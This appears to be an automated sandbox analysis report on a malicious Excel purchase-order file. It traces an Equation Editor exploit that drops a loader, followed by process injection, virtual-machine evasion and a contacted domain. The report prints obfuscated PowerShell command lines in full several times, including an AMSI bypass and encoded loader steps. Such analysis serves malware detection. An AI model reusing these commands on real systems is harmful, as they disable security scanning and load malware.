6,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: obi[1].exe.4.drStatic PE information: section name: .xdata
          Source: obi[1].exe.4.drStatic PE information: section name: .vmp0
          Source: obi[1].exe.4.drStatic PE information: section name: .cobf
          Source: vbc.exe.4.drStatic PE information: section name: .xdata
          Source: vbc.exe.4.drStatic PE information: section name: .vmp0
          Source: vbc.exe.4.drStatic PE information: section name: .cobf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041682D push es; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0040102E push esp; iretd
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A1B1 push ecx; iretd
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041CEF2 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041CEFB push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041CEA5 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041CF5C push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_004177B7 push ebp; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A0DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0019E3E6 pushad ; ret
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020BDFA1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .vmp0 entropy: 7.19991970418
          Source: initial sampleStatic PE information: section name: .vmp0 entropy: 7.19991970418
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xEF
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: PO20210722.xlsxStream path 'EncryptedPackage' entropy: 7.9988688056 (max. 8.0)

          Malware Analysis System Evasion:

          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000C98E4 second address: 00000000000C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000C9B4E second address: 00000000000C9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409A80 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3040Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2264Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3048Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: explorer.exe, 0000000C.00000000.2211664415.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.2218557691.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000C.00000000.2226824283.0000000008399000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0P
          Source: explorer.exe, 0000000C.00000000.2218557691.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000C.00000000.2218557691.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 0000000C.00000000.2226824283.0000000008399000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Z
          Source: explorer.exe, 0000000C.00000000.2218419344.00000000041AD000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 0000000C.00000000.2234195803.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\calc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409A80 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0040ACC0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A126F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020A0080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020A00EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020C26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\calc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00401180 Sleep,Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,Sleep,exit,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.jewelryengravings.com
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\calc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\calc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: AB0000
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 7EFDE008
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\calc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,4
6,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,4